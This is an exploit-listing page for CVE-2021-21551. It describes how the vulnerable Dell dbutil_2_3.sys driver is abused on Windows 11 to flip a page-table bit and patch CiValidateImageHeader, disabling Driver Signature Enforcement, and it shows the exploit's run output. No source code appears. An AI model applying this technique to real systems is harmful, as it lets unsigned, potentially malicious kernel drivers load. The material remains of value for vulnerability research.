Share
## https://sploitus.com/exploit?id=5FBF325A-6BF1-559B-A086-E3C0C2B72AAB
# CVE-2021-21551
Dell dbutil_2_3.sys driver Windows 11 exploit - exploiting ring0 memcpy-like functionality to disable Driver Signing Enforcement (DSE) and bypass Kernel Data Protection (KDP). No HVCI.

Tested on Windows 11 23H2.

### Disclaimer

This is exploit is released in the interest of exploring the Windows kernel for self-education. I take zero responsibility for bugchecks, and for whatever you do with this. Don't be stupid. 

### Usage

```bash
C:\Users\me\Desktop>MSI_win11.exe
[+] ntoskrnl.exe: FFFFF80480000000
[+] Ci.dll: FFFFF804816E0000
[+] MiGetPteAddress address: FFFFF804802370C7
[+] CiValidateImageHeader address: FFFFF80481734560
[+] pteBase address = 0xFFFFA20000000000
[+] pte = 0x01000002393E7121
[+] PTE with bit flipped: 0x01000002393E7123
[+] PTE updated
[+] Read original first 4 bytes of CiValidateImageHeader: 48 89 5c 24
[+] Patched. Load your unsigned driver and then press any key to revert the changes.
<enter>
[+] Original bytes and PTE reverted
```

### Driver

You'll have to find the vulnerable driver yourself. It won't compile either, you'll have to add the missing structs and headers, it shouldn't be that hard, good luck. Again, don't be stupid. Use if for self-education only.

### Reference

- https://nvd.nist.gov/vuln/detail/CVE-2021-21551